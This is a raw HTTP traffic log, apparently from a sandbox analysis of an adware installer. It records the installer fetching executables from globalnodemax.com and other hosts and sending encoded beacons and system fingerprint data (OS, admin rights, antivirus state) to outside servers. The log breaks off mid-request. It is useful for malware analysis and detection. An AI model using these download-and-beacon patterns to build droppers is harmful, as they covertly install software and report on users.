Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: Mp1ewndJ6vrChdqGnXr/dOIJ/9/4VL/6/59Hhz Zy/u/ep0BynvHzAdQOhf8FvYT
x-amz-request-id: A52A7292C444FF68
Date: Sat, 01 Aug 2015 04:17:58 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GET /utility.gif?report=fdata&f=1&c=001729&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1438402686 HTTP/1.1
Host: errors.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: 49rDN5TWWXIPsLO3mA77XCo UQY421eqt0BVSomF5EjYc8ajLbgwi2FbWpUPHdPI
x-amz-request-id: 238C49BCAB1BACCA
Date: Sat, 01 Aug 2015 04:17:59 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GET /utility.gif?report=fdata&f=1&c=001729&i=10000&n=deploy_end_funnel_step_name&rnd=1438402686 HTTP/1.1
Host: errors.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: HQe49oiHw231ffhBFrLfnN aKhHcq21zVmFK 9xMW7ZS0KaDlm1tunl2U4mcE4Y4
x-amz-request-id: 7DB49418C46925FF
Date: Sat, 01 Aug 2015 04:17:59 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GET /utility.gif?report=fdata&f=3&c=803&i=10&n=ms_started&rnd=14220 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 01 Aug 2015 04:17:39 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GET /22600.ashx?e=b1dRW7RxYKdJjQ9qCj/WvVoXilXt x7lm0bTQPH88bQ2fVsQFDtppP2TEkHeJNDUDPI5dGTWg7/48CMVjnZqYdnXPxrWRGn2d/XCztdoPbJFiFlIaXxqEcmxw368usKjvx7ENkzRxOw/caEgn1aywj5N0jWsNR8MoexnI9SC14XbVwDStlFVZXVJgYQsPAh56xK0PQZ59GgROorJaaO22BkEWzuBPTEcJ0k C/6MtQnml2XdXjKhJm0LdlReY2/iE4Rn18L003uz0Lu2aZ4hDhQmP15je1GaTsjjJ8mc3T10pg6XDy/3LwNoUkQDviUHTEz4kyYc5/8KqZVqYWlwcAjHfcNnTKtbTyejejUzNC3Sr/B971errA9fO2Yg5guFF8alrqvW22iZlBAV/P QIa 2UJQ2VzF0N25JKCCCveTyBEepkkHbwkqC3cQqqaHCVSjIz3u7VGsuJbKr /YbypnDhgEfcwOQ UeIwETGMM8UMNmz6spbXupRrnThziN0QI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiaF8KpepynoFA== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:07 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
GET /web/gf/all/setup.exe_e HTTP/1.1
Host: dl.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:39 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1438313686"
Last-Modified: Fri, 31 Jul 2015 03:34:46 GMT
Cache-Control: max-age=461
Content-Length: 2113807
Content-Type: text/plain
X-HW: 1438402659.dop003.fr7.t,1438402659.cds030.fr7.c
<<< skipped >>>
GET / HTTP/1.1
Host: ipgeoapi.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:52 GMT
Connection: keep-alive
Content-Type: application/json;charset=utf-8
Content-Length: 40
Server: thin 1.4.1 codename Chromeo
Via: 1.1 vegur
{"country_code":222,"country_name":"UA"}
GET /spdbt/shoppy/snsch7.exe HTTP/1.1
Range: bytes=0-249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Date: Sat, 01 Aug 2015 04:17:00 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1438276472"
Last-Modified: Thu, 30 Jul 2015 17:14:32 GMT
Cache-Control: max-age=1116
Content-Length: 228352
Content-Range: bytes 0-228351/228352
Content-Type: application/x-msdownload
X-HW: 1438402620.dop002.fr7.t,1438402620.cds001.fr7.c
Content-Disposition: attachment; filename="snsch7.exe"
<<< skipped >>>
GET /t.ashx?e=KC46TpkJIZxD761tAXRB5U7/thpU6drhyMlYLXuYTiSJSpJdq6tfQEEt4u7lqt3szjf8TpbxLO738863hYmkYTdCD9FwPsb7YCpHZc9ZUaGLbhvor/ikhRQC drCF7eFysWDrahxHN3E0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 XpkvY14xYJ8 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: dnnw5pp7-zxis6jz8.netdna-ssl.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13
Connection: keep-alive
Cache-Control: private,no-cache, no-store
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
abfgshdgfjhsk
GET /t.ashx?e=KC46TpkJIZxD761tAXRB5U7/thpU6drhyMlYLXuYTiSJSpJdq6tfQEEt4u7lqt3szjf8TpbxLO738863hYmkYTdCD9FwPsb7YCpHZc9ZUaGLbhvor/ikhRQC drCF7eFysWDrahxHN3E0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 XpkvY14xYJ8 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: dnnw5pp7-zxis6jz8.netdna-ssl.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13
Connection: keep-alive
Cache-Control: private,no-cache, no-store
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
abfgshdgfjhsk
GET /t.ashx?e=KC46TpkJIZxD761tAXRB5U7/thpU6drhyMlYLXuYTiSJSpJdq6tfQEEt4u7lqt3szjf8TpbxLO738863hYmkYTdCD9FwPsb7YCpHZc9ZUaGLbhvor/ikhRQC drCF7eFysWDrahxHN3E0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 XpkvY14xYJ8 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: dnnw5pp7-zxis6jz8.netdna-ssl.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:01 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13
Connection: keep-alive
Cache-Control: private,no-cache, no-store
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
abfgshdgfjhsk
GET /spdbt/shoppy/snsch7.exe_a HTTP/1.1
Host: dl.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:39 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1438276436"
Last-Modified: Thu, 30 Jul 2015 17:13:56 GMT
Cache-Control: max-age=1461
Content-Length: 2088396
Content-Type: text/plain
X-HW: 1438402659.dop008.fr7.t,1438402659.cds037.fr7.sr,1438402659.dop005.dc1.r,1438402659.cds007.dc1.c,1438402659.cds037.fr7.pr
<<< skipped >>>
GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=0-249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: zh9k747-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Date: Sat, 01 Aug 2015 04:17:01 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: Ff0tvEZ7TNf0Ib5reYtPfrKedAC4/rcfjvUMu8VaTnj20Erg0QhkbbwSB0nUis97
x-amz-request-id: 71D5806249DDB72C
Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT
ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"
Accept-Ranges: bytes
Content-Range: bytes 0-249999/7202374
Server: NetDNA-cache/2.2
X-Cache: MISS
<<< skipped >>>
GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=750000-999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: zh9k747-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Date: Sat, 01 Aug 2015 04:17:03 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: ORIgKUFYzPctLonZ5sfU7Xm3Z/awsU4YVXbTn9Fmq0VTapofoeLgak1kmhNPuP1v
x-amz-request-id: FD6CA1343228A6E2
Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT
ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"
Server: NetDNA-cache/2.2
X-Cache: MISS
Content-Range: bytes 750000-999999/7202374
<<< skipped >>>
GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=2750000-2999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: zh9k747-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Date: Sat, 01 Aug 2015 04:17:08 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: ORIgKUFYzPctLonZ5sfU7Xm3Z/awsU4YVXbTn9Fmq0VTapofoeLgak1kmhNPuP1v
x-amz-request-id: FD6CA1343228A6E2
Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT
ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 2750000-2999999/7202374
<<< skipped >>>
GET /web/gf/all/setup.exe_b HTTP/1.1
Host: dl.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:39 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1438313678"
Last-Modified: Fri, 31 Jul 2015 03:34:38 GMT
Cache-Control: max-age=461
Content-Length: 2113811
Content-Type: text/plain
X-HW: 1438402659.dop004.fr7.t,1438402659.cds019.fr7.c
<<< skipped >>>
GET /utility.gif?report=fdata&f=1&c=000803&i=100&n=init_start_funnel_step_name&rnd=1438402673 HTTP/1.1
Host: errors.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: dAw/liqqWTYvkgrTuvEXvpnkrLTMvVUD1tlOzMJdvpzmaY2IOqSn2XigsWsK38oL
x-amz-request-id: 908EBC47E196F56B
Date: Sat, 01 Aug 2015 04:17:47 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /installer-error.gif?action=sesamy&app=70299&appver=0&ver=1_36_01_22&version_date=15-07-30&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=917D2960B3D84DB6B81D64AD35FD7055PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1438402673&procruntime=8&rnd=1438402681 HTTP/1.1
Host: errors.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: ytO4vJkZmgPQsPE8ZicOKg/TazF ALRsecC1BdiqeStkpJUHZpXeANopYNI0pcoW
x-amz-request-id: A59EC85101E4A3BC
Date: Sat, 01 Aug 2015 04:17:54 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 12:54:37 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /utility.gif?report=fdata&f=1&c=000803&i=200&n=init_end_funnel_step_name&rnd=1438402681 HTTP/1.1
Host: errors.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: Oky38/eCjy7OODYBI1fP/OxbXrD25SWkNMboQyZJZlG8zId Z3qHmxi6iYpe4A6
x-amz-request-id: ED98BA1FD40EE246
Date: Sat, 01 Aug 2015 04:17:54 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /utility.gif?report=fdata&f=1&c=000803&i=300&n=deploy_start_funnel_step_name&rnd=1438402681 HTTP/1.1
Host: errors.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: bU0dbyk Dftpq2 aHCublVFqY3XSHtptEAjtmGs kPtcheT67Y6RhdtK7C0P1KQd
x-amz-request-id: 9CE2FBF16301DA57
Date: Sat, 01 Aug 2015 04:17:54 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /utility.gif?report=fdata&f=1&c=000803&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1438402683 HTTP/1.1
Host: errors.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: x64Ya5m3gvMwWeOcnb21csBeUPVgaBIh3MuyZEjOndX8N0bPlA7OPp0J9X0ltkIj
x-amz-request-id: FFFB3079D52EB7D7
Date: Sat, 01 Aug 2015 04:17:56 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /utility.gif?report=fdata&f=1&c=000803&i=500&n=deploy_notification_start_funnel_step_name&rnd=1438402684 HTTP/1.1
Host: errors.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: CxVNWPPE639J9rX/UW3TEAUhNim/VC66u9YXddC2RPcGOatR6ui9CeEBZ4m8D0Eq
x-amz-request-id: 037D76B3B4714689
Date: Sat, 01 Aug 2015 04:17:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /utility.gif?report=fdata&f=1&c=000803&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1438402684 HTTP/1.1
Host: errors.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: Hw2JgDrr7f95bxQRSadU1mXiG6EPIO7BHJgKe3VbS4iid2xS/f7WKmDXUNQPAwpw
x-amz-request-id: E9DEABF7C8FAD906
Date: Sat, 01 Aug 2015 04:17:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /utility.gif?report=fdata&f=1&c=000803&i=700&n=deploy_ch_start_funnel_step_name&rnd=1438402684 HTTP/1.1
Host: errors.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: ew36Rl1lQpGzRXUzIUsRKSDKq61H04aeworP BGzCnqiUj2sJLYh3i2agE9Ww0Z4
x-amz-request-id: 8E9C3E8FDD41CDDD
Date: Sat, 01 Aug 2015 04:17:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /utility.gif?report=fdata&f=1&c=000803&i=800&n=deploy_nova_start_funnel_step_name&rnd=1438402684 HTTP/1.1
Host: errors.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: u8L8g OcpDPUE/DAvWyxq1crzIJfvQnFHa3VbGDePy83DEaEhC9Nz8jdcc1F6B45
x-amz-request-id: 5E6BDDB578CBE407
Date: Sat, 01 Aug 2015 04:17:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /utility.gif?report=fdata&f=1&c=000803&i=900&n=deploy_ff_start_funnel_step_name&rnd=1438402684 HTTP/1.1
Host: errors.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: UCaQ3gC7IavD5/gUoUwiGCFKzL9VedOUAOyl921qMR5J7fFko5FZDlcNYsef0luo
x-amz-request-id: BE10D10CFB0F8265
Date: Sat, 01 Aug 2015 04:17:58 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /utility.gif?report=fdata&f=1&c=000803&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1438402685 HTTP/1.1
Host: errors.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: Xtj9ESPhmRhvourGAUMfhhDi66vsGSmoiERpazW7FrxKUqWNVqZOqtSRcuVOtSfx
x-amz-request-id: 1F6B7E69A00AFE10
Date: Sat, 01 Aug 2015 04:17:58 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /utility.gif?report=fdata&f=1&c=000803&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1438402685 HTTP/1.1
Host: errors.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: J RiUCIv9UbGV9QKdBiA1PfPhwTTiRDzvNjF ZNLKLreDb7jkNeS NgiL9p1Y8y7
x-amz-request-id: 75D69D298E0C021E
Date: Sat, 01 Aug 2015 04:17:58 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /utility.gif?report=fdata&f=1&c=000803&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1438402685 HTTP/1.1
Host: errors.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: TB4UIlZFQJklwAbk3hnXyCdvereoU/VJ/UcM4D25xdRGw 40yOIHU0zI ulXrF6
x-amz-request-id: 5AB4E82C8B913783
Date: Sat, 01 Aug 2015 04:17:58 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /utility.gif?report=fdata&f=1&c=000803&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1438402686 HTTP/1.1
Host: errors.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: YoWvw jcpSZmxcpT84VXuZxQmY3rmxfG1VQOydNZQIp1hPRR5o2KffknMhO33Bek
x-amz-request-id: 496E6ACCB795167E
Date: Sat, 01 Aug 2015 04:17:59 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /utility.gif?report=fdata&f=1&c=000803&i=10000&n=deploy_end_funnel_step_name&rnd=1438402686 HTTP/1.1
Host: errors.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: COv52cSnaP33B4ZbuFKw4/DGCAwGwtoSJRu/E/WKOryd5h54JRJgu6mXhEFhL44a
x-amz-request-id: 106700D46806931E
Date: Sat, 01 Aug 2015 04:17:59 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /app/ping.ashx?action=S_INSTALL&usid=1844237615-1960408961-1801674531&aff=obrdc1_0_0_0_0,99999999-9999-4a59-bea0-eea83fb95fc9,&rnd=27944&v=1.0.8654.1177&url=&title=&pingtext=Files& protocol=&size=0&ref=&browser= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: VVV.ytdownloader.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 01 Aug 2015 04:17:39 GMT
GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=250000-499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: zh9k747-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Date: Sat, 01 Aug 2015 04:17:01 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50
x-amz-request-id: C9E56CCB583C269B
Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT
ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"
Server: NetDNA-cache/2.2
X-Cache: MISS
Content-Range: bytes 250000-499999/7202374
<<< skipped >>>
GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=500000-749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: zh9k747-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Date: Sat, 01 Aug 2015 04:17:03 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50
x-amz-request-id: C9E56CCB583C269B
Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT
ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 500000-749999/7202374
<<< skipped >>>
GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=1000000-1249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: zh9k747-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Date: Sat, 01 Aug 2015 04:17:03 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50
x-amz-request-id: C9E56CCB583C269B
Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT
ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 1000000-1249999/7202374
<<< skipped >>>
GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=1250000-1499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: zh9k747-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Date: Sat, 01 Aug 2015 04:17:03 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50
x-amz-request-id: C9E56CCB583C269B
Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT
ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 1250000-1499999/7202374
<<< skipped >>>
GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=1500000-1749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: zh9k747-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Date: Sat, 01 Aug 2015 04:17:04 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50
x-amz-request-id: C9E56CCB583C269B
Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT
ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 1500000-1749999/7202374
<<< skipped >>>
GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=1750000-1999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: zh9k747-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Date: Sat, 01 Aug 2015 04:17:04 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50
x-amz-request-id: C9E56CCB583C269B
Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT
ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 1750000-1999999/7202374
<<< skipped >>>
GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=2000000-2249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
